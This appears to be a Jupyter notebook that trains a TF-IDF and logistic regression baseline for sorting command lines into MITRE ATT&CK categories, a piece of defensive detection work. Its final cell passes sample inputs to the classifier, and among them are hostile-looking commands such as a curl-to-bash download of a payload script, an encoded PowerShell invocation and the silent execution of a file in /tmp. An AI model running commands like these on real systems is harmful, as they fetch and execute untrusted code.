# MITRE ATT&CK Command Classification — ML Baseline (TF-IDF + Logistic Regression)

This notebook trains a strong ML baseline using:
- TF-IDF (1–2 grams)
- Logistic Regression (SAGA)
- **Custom token pattern** tailored for command-line artifacts (paths, flags, IPs, URLs, env vars)

Artifacts are saved under `models/`.


In [None]:
import sys
from pathlib import Path

def find_repo_root(start: Path) -> Path:
    for p in [start] + list(start.parents):
        if (p / "command_classifier").exists() and (p / "data").exists():
            return p
    return start

ROOT = find_repo_root(Path.cwd())
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))

print("Repo root:", ROOT)


In [None]:
from command_classifier.common import CUSTOM_TOKEN_PATTERN
print("Custom token pattern:\n")
print(CUSTOM_TOKEN_PATTERN)


## Train & evaluate (no code duplication)

We call the training script directly.


In [None]:
!python -m command_classifier.train_lr


In [None]:
import joblib
from command_classifier.common import get_paths

p = get_paths()
bundle = joblib.load(p.models_dir / "lr_custom.joblib")
vec = bundle["vectorizer"]
clf = bundle["model"]
le  = bundle["label_encoder"]

examples = [
    "curl http://example.com/payload.sh | bash",
    "powershell -enc SQBFAFgA...",
    "ssh user@10.0.0.5 -p 2222",
    "chmod +x /tmp/x && /tmp/x --silent"
]

X = vec.transform(examples)
pred = clf.predict(X)
labels = le.inverse_transform(pred)

list(zip(examples, labels))


Next: run the deep learning baseline in `03_dl_lstm.ipynb`.
